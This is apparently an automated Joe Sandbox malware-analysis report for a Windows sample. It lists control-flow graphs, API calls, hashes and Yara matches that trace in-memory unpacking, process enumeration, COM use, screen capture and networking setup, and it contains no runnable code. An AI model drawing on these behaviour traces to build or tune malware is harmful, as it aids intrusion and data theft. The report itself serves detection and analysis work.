                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                                                                                                                                                                                                  • API String ID: 0-74227037
                                                                                                                                                                                                                                                  • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                                                  • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 271 40aa32-40aa35 272 40aa82 271->272 273 40aa37-40aa5f 271->273 274 40aa60-40aa72 273->274 274->274 275 40aa74-40aa7b 274->275 278 40aa00-40aa12 275->278 278->278 279 40aa14-40aa2e 278->279
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: MO$MO
                                                                                                                                                                                                                                                  • API String ID: 0-3148518880
                                                                                                                                                                                                                                                  • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                                  • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 307 4402c0-4402f2 LdrInitializeThunk
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(0044316E,00655ED0,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 216003c-2160047 1 216004c-2160263 call 2160a3f call 2160e0f call 2160d90 VirtualAlloc 0->1 2 2160049 0->2 17 2160265-2160289 call 2160a69 1->17 18 216028b-2160292 1->18 2->1 23 21602ce-21603c2 VirtualProtect call 2160cce call 2160ce7 17->23 20 21602a1-21602b0 18->20 22 21602b2-21602cc 20->22 20->23 22->20 29 21603d1-21603e0 23->29 30 21603e2-2160437 call 2160ce7 29->30 31 2160439-21604b8 VirtualFree 29->31 30->29 33 21605f4-21605fe 31->33 34 21604be-21604cd 31->34 37 2160604-216060d 33->37 38 216077f-2160789 33->38 36 21604d3-21604dd 34->36 36->33 42 21604e3-2160505 LoadLibraryA 36->42 37->38 43 2160613-2160637 37->43 40 21607a6-21607b0 38->40 41 216078b-21607a3 38->41 44 21607b6-21607cb 40->44 45 216086e-21608be LoadLibraryA 40->45 41->40 46 2160517-2160520 42->46 47 2160507-2160515 42->47 48 216063e-2160648 43->48 49 21607d2-21607d5 44->49 52 21608c7-21608f9 45->52 50 2160526-2160547 46->50 47->50 48->38 51 216064e-216065a 48->51 53 21607d7-21607e0 49->53 54 2160824-2160833 49->54 55 216054d-2160550 50->55 51->38 56 2160660-216066a 51->56 59 2160902-216091d 52->59 60 21608fb-2160901 52->60 61 21607e4-2160822 53->61 62 21607e2 53->62 58 2160839-216083c 54->58 63 2160556-216056b 55->63 64 21605e0-21605ef 55->64 57 216067a-2160689 56->57 67 2160750-216077a 57->67 68 216068f-21606b2 57->68 58->45 69 216083e-2160847 58->69 60->59 61->49 62->54 65 216056f-216057a 63->65 66 216056d 63->66 64->36 70 216057c-2160599 65->70 71 216059b-21605bb 65->71 66->64 67->48 72 21606b4-21606ed 68->72 73 21606ef-21606fc 68->73 74 216084b-216086c 69->74 75 2160849 69->75 83 21605bd-21605db 70->83 71->83 72->73 77 21606fe-2160748 73->77 78 216074b 73->78 74->58 75->45 77->78 78->57 83->55
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 233 60378e-6037a7 234 6037a9-6037ab 233->234 235 6037b2-6037be CreateToolhelp32Snapshot 234->235 236 6037ad 234->236 237 6037c0-6037c6 235->237 238 6037ce-6037db Module32First 235->238 236->235 237->238 243 6037c8-6037cc 237->243 239 6037e4-6037ec 238->239 240 6037dd-6037de call 60344d 238->240 244 6037e3 240->244 243->234 243->238 244->239
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006037B6
                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 006037D6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Offset: 00602000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_602000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction ID: 5dff0cbc1e9144583d868a154a26becd755ad7a6086854f724299927ce494f1f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF0F6B1240720ABD7243BF5AC8CBAFB2EDAF49726F10052CF642956C0DB70ED454A65

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 246 2160e0f-2160e24 SetErrorMode * 2 247 2160e26 246->247 248 2160e2b-2160e2c 246->248 247->248
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 281 440260-440271 282 4402a5-4402a6 call 43eb40 281->282 283 440286-440298 call 441850 RtlReAllocateHeap 281->283 284 440278-44027f 281->284 285 44029a-4402a3 call 43eb20 281->285 290 4402ab-4402ae 282->290 292 4402b0-4402b2 283->292 284->282 284->283 285->292 290->292
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                                                  • Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 293 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Startup
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                                                                                                                                  • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                                  • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 299 43eb40-43eb4c 300 43eb53-43eb54 299->300 301 43eb55-43eb67 call 441850 RtlFreeHeap 299->301
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                  • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                                  • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 304 4404b1-4404c9 GetForegroundWindow call 4421e0 306 4404ce-4404e8 304->306
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 004404BF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2020703349-0
                                                                                                                                                                                                                                                  • Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                                                                                                                                                                  • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 308 43eb20-43eb37 call 441850 RtlAllocateHeap
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                                                  • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0060349E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Offset: 00602000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_602000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction ID: a444563d3947e0ca86d8e8bd477876e5d427e3eef385bb0893b12c7c12c59049
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09113C79A40208EFDB01DF98C985E99BBF5AF08351F058094F9489B362D771EA50DF84
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                                                  • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                                                  • API String ID: 65563702-2807872674
                                                                                                                                                                                                                                                  • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                                                  • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0219BF33
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(37C935C6), ref: 0219BFAD
                                                                                                                                                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0219BFEB
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(37C935C6), ref: 0219C050
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(37C935C6), ref: 0219C137
                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0219C1A5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                                                  • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                                                  • API String ID: 65563702-2807872674
                                                                                                                                                                                                                                                  • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                                  • Instruction ID: 2ea05d585345a48718c2f277d08ab2f09f1805a6f65375db0bb7231e1dc269c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE52EF726483408BD724CF28C8917ABBBE1EFCA314F188A2DE5D587391D775D806CB92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                                  • String ID: Y
                                                                                                                                                                                                                                                  • API String ID: 1298755333-3233089245
                                                                                                                                                                                                                                                  • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                                  • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                                                                                                                                                                                                  • API String ID: 237503144-2846770461
                                                                                                                                                                                                                                                  • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                                                                                                                                                                  • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
